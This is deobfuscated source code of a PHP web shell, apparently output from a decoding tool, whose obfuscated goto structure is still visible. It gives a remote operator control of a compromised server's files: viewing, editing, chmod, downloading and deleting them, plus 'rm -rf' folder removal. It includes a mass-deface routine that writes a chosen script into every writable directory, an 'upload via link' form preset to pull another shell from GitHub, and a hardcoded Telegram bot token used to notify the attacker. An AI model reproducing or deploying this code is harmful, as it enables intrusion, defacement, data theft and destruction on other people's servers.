	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a>\xa\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>\xa	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=unzip_file&opn={$file}'><i class='bi bi-file-zip-fill'></i></a>
		\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_file&opn={$path}/{$file}'><i class='bi bi-calendar'></i></a>
\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a>
\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod&opn={$path}/{$file}'><i class='bi bi-file-lock-fill'></i></a>\xa	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a>\xa\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a>
\x9	</div>\xa\x9\x9<div class='card card-body text-dark input-group mb-3'>
	\x9	<p>Are you sure to unzip : " . basename($file) . " ?</p>
	\x9	<form method='POST'>
\x9			<a class='btn btn-danger btn-block btn-sm' href='?dir=" . hex($dir) . "'>No</a>
\x9\x9\x9\x9<input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'>
		\x9</form>\xa\x9\x9</div>"; } goto NqgrS; SH6LF: D4Dlr: goto kPsi7; yWSnK: Nwx3I: goto YnPrN; T223U: goto sWyZ2; goto M3aA3; ONGIi: fGDY0: goto KfMrU; Iu50C: goto QtYOL; goto C9c37; rJiQh: $pl = exe("perl --help") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto NIMXe; t03jb: $filename = __FILE__; goto K44qW; axLKv: function w($dir, $perm) { if (!is_writable($dir)) { return "<rd>" . $perm . "</rd>"; } else { return "<gr>" . $perm . "</gr>"; } } goto W916h; kKDOw: goto IVobD; goto ZrHOp; Rm5Ns: goto s_cq9; goto Njg7s; NqgrS: goto hKE8D; goto Z2Byx; nc1Ay: goto eBqeZ; goto KyHu0; nwitw: if (isset($_7["dir"])) { $dir = unhex($_7["dir"]); chdir($dir); } else { $dir = hex($gcw()); } goto emyW3; osP09: goto RWaoe; goto US9Ue; MFdHq: $path = str_replace("\", "/", $path); goto HlE6K; XtGrk: u21ap: goto PyOJP; PPrH1: if (isset($_7["r_f"])) { $old = $file; $new = $_7["new_name"]; rename($new, $old); if (file_exists($new)) { echo "<div class="alert alert-warning alert-dismissible fade show my-3" role="alert">
	\x9\x9<strong>Rename file</strong> name already in use! <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>\xa		</div>"; } else { if (rename($old, $new)) { echo "<strong>Rename file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Rename file</strong> fail! " . er() . "</div>"; } } } goto p0Xma; ptoEg: goto Rl8Ii; goto V8psl; EoJs0: if ($_7["id"] == "deface") { function mass_all($dir, $namefile, $contents_sc) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $ = $dirc . "/" . $namefile; if ($dirb === ".") { $fungsi[2]($, $contents_sc); } elseif ($dirb === "..") { $fungsi[2]($, $contents_sc); } else { if ($fungsi[1]($dirc)) { if (is_writable($dirc)) { echo "[<gr><i class='bi bi-check-all'></i></gr>]&nbsp;{$}<br>"; $fungsi[2]($, $contents_sc); $ = mass_all($dirc, $namefile, $contents_sc); } } } } } } function mass_onedir($dir, $namefile, $contents_sc) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $ = $dirc . "/" . $namefile; if ($dirb === ".") { $fungsi[2]($, $contents_sc); } elseif ($dirb === "..") { $fungsi[2]($, $contents_sc); } else { if ($fungsi[1]($dirc)) { if (is_writable($dirc)) { echo "[<gr><i class='bi bi-check-all'></i></gr>]&nbsp;{$dirb}/{$namefile}<br>"; $fungsi[2]($, $contents_sc); } } } } } } if ($_7["start"]) { if ($_7["tipe"] == "mass") { mass_all($_7["d_dir"], $_7["d_file"], $_7["script"]); } elseif ($_7["tipe"] == "onedir") { mass_onedir($_7["d_dir"], $_7["d_file"], $_7["script"]); } } s(); echo "\xa\x9\x9<div class='card card-body text-dark input-group mb-3'>\xa\x9	<u>Mass Deface</u>
\x9\x9\x9<form method='POST'> Tipe:\xa		\x9<div class='form-check'>
		\x9	<input class='form-check-input' type='checkbox' value='onedir' name='tipe' id='flexCheckDefault' checked>\xa\x9		\x9<label class='form-check-label' for='flexCheckDefault'>One dir</label>
\x9	\x9</div>\xa\x9		<div class='form-check'>\xa\x9\x9\x9	<input class='form-check-input' type='checkbox' value='mass' name='tipe' id='flexCheckDefault'>
\x9		\x9<label class='form-check-label' for='flexCheckDefault'>All directory</label>
	\x9\x9</div>
		\x9	<i class='bi bi-folder'></i> Directory:
\x9	\x9	<input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}'>
	\x9\x9\x9<i class='bi bi-file-earmark'></i> Filename:\xa		\x9	<input class='form-control btn-sm' type='text' name='d_file' placeholder='filename'>\xa		\x9\x9<i class='bi bi-file-earmark'></i> Your script:\xa				<textarea class='form-control btn-sm' rows='7' name='script' placeholder='your script'></textarea>
\x9\x9		<div class='d-grid gap-2'>
	\x9	\x9<input class='btn btn-dark btn-sm'type='submit' name='start' value='deface'>\xa\x9\x9	\x9</div>
	\x9\x9</form>
	\x9</div>"; } goto Rm5Ns; pdGjy: goto kAEUT; goto uxESJ; nO2y6: goto e0LVC; goto zSsTm; H0PkX: goto OY_it; goto hy3Yx; fgATR: goto K2OD0; goto oUC3I; uBkmK: goto Cw7TO; goto ld3Ay; eWOz0: if ($_7["id"] == "searchbyEXT") { function search_by_extension($dir, $extensi, $sort_by_date = false) { $result = array(); if (is_readable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; if ($dirb === "." || $dirb === "..") { continue; } if (is_dir($dirc)) { $result = array_merge($result, search_by_extension($dirc, $extensi, $sort_by_date)); } else { $fileExt = pathinfo($dirb, PATHINFO_EXTENSION); if (strcasecmp($fileExt, $extensi) === 0) { $result[] = $dirc; } } } } if ($sort_by_date) { usort($result, function ($a, $b) { return filemtime($b) - filemtime($a); }); } return $result; } if ($_7["start"]) { $dir = $_7["d_dir"]; $extensi = ltrim($_7["extensi"], "."); $sort_by_date = isset($_7["sort_by_date"]) && $_7["sort_by_date"] == "on"; $search_results = search_by_extension($dir, $extensi, $sort_by_date); if (!empty($search_results)) { echo "<div class='alert alert-info'>Results for extension {$extensi} in directory {$dir}:</div>"; foreach ($search_results as $file) { $fileDate = date("Y-m-d H:i:s", filemtime($file)); echo "<div class='alert alert-success'>{$fileDate} - {$file}</div>"; } } else { echo "<div class='alert alert-warning'>No files with extension {$extensi} found in directory {$dir}.</div>"; } } s(); echo "\xa\x9\x9\x9<div class='card card-body text-dark input-group mb-3'>
		\x9<u>Search By EXT</u>
			\x9<form method='POST'>
	\x9\x9\x9<div class='input-group d-flex gap-2'>\xa\x9			\x9<i class='bi bi-folder'></i> Directory:
	\x9\x9	\x9</div>
			\x9\x9<div class='input-group'>
\x9		\x9\x9<input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}' {$_r}>
\x9			\x9</div>
\x9	\x9	\x9<div class='input-group d-flex gap-2'>
	\x9	\x9\x9<i class='bi bi-file-earmark'></i> EXT:\xa\x9\x9\x9\x9	</div>
\x9\x9	\x9	<div class='input-group'>
					\x9<input class='form-control btn-sm' type='text' name='extensi' placeholder='.php' value='{$extensi}' {$_r}><br>\xa\x9	\x9\x9	\x9</div>\xa	\x9\x9\x9		<div class='form-check'>
\x9\x9	\x9\x9\x9\x9<input class='form-check-input' type='checkbox' name='sort_by_date' id='sort_by_date' "; echo isset($_7["sort_by_date"]) && $_7["sort_by_date"] == "on" ? "checked" : ''; echo ">\xa		\x9\x9	\x9\x9<label class='form-check-label' for='sort_by_date'>Sort by date</label>
\x9	\x9	\x9	</div>\xa\x9		\x9\x9	<div class='input-group-append'>\xa		\x9\x9\x9	\x9<input class='btn btn-dark btn-sm' type='submit' name='start' value='search'>\xa	\x9				</div>\xa\x9	\x9	</form>
	\x9\x9</div>"; } goto lbxMx; M3aA3: jy7fd: goto vVelv; deg8m: @mb_internal_encoding("UTF-8"); goto otufx; Fo5Z3: if ($_7["id"] == "uploadvialink") { s(); if ($_SERVER["REQUEST_METHOD"] === "POST") { $url = isset($_POST["url"]) ? trim($_POST["url"]) : ''; $namafile = isset($_POST["namafile"]) ? trim($_POST["namafile"]) : "cong.php"; if (filter_var($url, FILTER_VALIDATE_URL)) { $content = file_get_contents($url); if ($content !== false) { $filePath = getcwd() . "/" . $namafile; $result = file_put_contents($filePath, $content); if ($result !== false) { echo "<strong>Upload file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Create file</strong> fail! " . er() . "</div>"; } } else { echo "<div><strong>Invalid URL</strong> fail! " . er() . "</div>"; } } } echo "<div class='card card-body text-dark input-group mb-3'>\xa		\x9\x9	<u>Upload Via Link [BYPASS]</u>
\x9	\x9\x9\x9<form method='POST' enctype='multipart/form-data'>\xa\x9	\x9\x9	\x9<div class='input-group'>
\x9				\x9<input class='form-control form-control-sm' type='url' name='url' placeholder='Enter the link' value='https://raw.githubusercontent.com/Mr-7Mind/MiniShell/main/ShellPass.php' required>
	\x9\x9\x9	</div>
	\x9\x9	\x9<div class='input-group'>\xa			\x9\x9\x9<input class='form-control form-control-sm' type='text' name='namafile' placeholder='Save As' value='cong.php'>
\x9				</div>\xa\x9			\x9<div class='input-group'>\xa		\x9	\x9	<button type='submit' name='upl' class='btn btn-primary'>Upload</button>
			\x9\x9</div>\xa\x9\x9\x9	</form>\xa			</div>"; } goto O2TiW; Vmn_x: $city = isset($data["city"]) ? $data["city"] : "Tidak Diketahui"; goto vYHYh; KfMrU: $botToken = "6961652611:AAH8xw3iHqE241-bJMX-Rousfidq1gZLJiA"; goto nc1Ay; ST4JP: KzNHr: goto mXEzo; F1IFe: curl_setopt($ch, CURLOPT_URL, $rib); goto YX2r_; WszL8: I694s: goto iXZQH; zBHc0: if ($_7["action"] == "rename") { s(); echo "<div class='btn-group'>
			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a>
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>\xa			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=unzip_file&opn={$file}'><i class='bi bi-file-zip-fill'></i></a>
			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_file&opn={$path}/{$file}'><i class='bi bi-calendar'></i></a>\xa	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a>\xa	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod&opn={$path}/{$file}'><i class='bi bi-file-lock-fill'></i></a>
\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a>
\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a>
\x9\x9</div>\xa	\x9<br>\xa\x9\x9\x9<i class='bi bi-file-earmark'></i>:&nbsp;" . basename($file) . "
	\x9</br>
\x9	<form method='POST'>
\x9	\x9<div class='input-group'>\xa	\x9\x9\x9<input class='form-control btn-sm' type='text' name='new_name' value='" . basename($file) . "' {$_r}>\xa\x9\x9	\x9<button class='btn btn-outline-light btn-sm' type='sumbit' name='r_f'><i class='bi bi-arrow-return-right'></i></button>
			</div>
	\x9</form>"; } goto wdhOZ; AaGLi: if ($_7["action"] == "delete_folder") { s(); if ($_7["yeah"]) { if ($fungsi[1]($dir)) { if (is_writable($dir)) { @rmdir($dir); @exe("rm -rf {$dir}"); @exe("rmdir /s /q {$dir}"); echo "<strong>Delete folder</strong> ok! " . ok() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } else { echo "<strong>Delete folder</strong> fail! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } } echo "
	\x9<div class='btn-group mb-3'>\xa		\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>
\x9	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a>\xa\x9\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_folder'><i class='bi bi-calendar'></i></a>
\x9\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a>\xa\x9\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_folder'><i class='bi bi-trash-fill'></i></a>\xa\x9	</div>
\x9	<div class='card card-body text-dark input-group mb-3'>\xa	\x9	<p>Are you sure to delete : " . basename($dir) . " ?</p>\xa		\x9<form method='POST'>
	\x9		<a class='btn btn-danger btn-block btn-sm' href='?dir=" . dirname($dir) . "'>No</a>
\x9\x9\x9	<input type='submit' name='yeah' class='btn btn-success btn-block btn-sm' value='Yes'>\xa	\x9	</form>\xa\x9	</div>"; } goto Pexjf; LSAD6: if (isset($_7["dir"])) { $dir = unhex($_7["dir"]); chdir($dir); } else { $dir = hex($gcw()); } goto p_X1N; G6W2I: goto tIIkt; goto Ccdo0; UiiN6: goto Czge0; goto newX3; ugMwL: JN_Oc: goto Mq334; MbUDf: q1vD_: goto aZblL; YMAqF: if (isset($_POST["pass"])) { $enteredPassword = $_POST["pass"]; if ($enteredPassword === $correctPassword) { $_SESSION["forbidden"] = true; } else { echo "<script>alert("what do u want to do? fuck bitch!");</script>"; } } goto jSAwj; TaKsn: file_get_contents($telegramApiUrl); goto hyWxJ; BhbXk: $curl = $GLOBALS["fungsi"][5]("curl_version") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto gjAoI; o3T1g: V3aam: goto xJU6c; EHvWy: ANvpy: goto n9cie; H5uEs: $_r = "required='required'"; goto iZFXr; G3vw5: ?> 

Function Calls

None

Variables

None

Stats

MD5 f7ad590fce62c3604848399a73b2d830
Eval Count 0
Decode Time 116 ms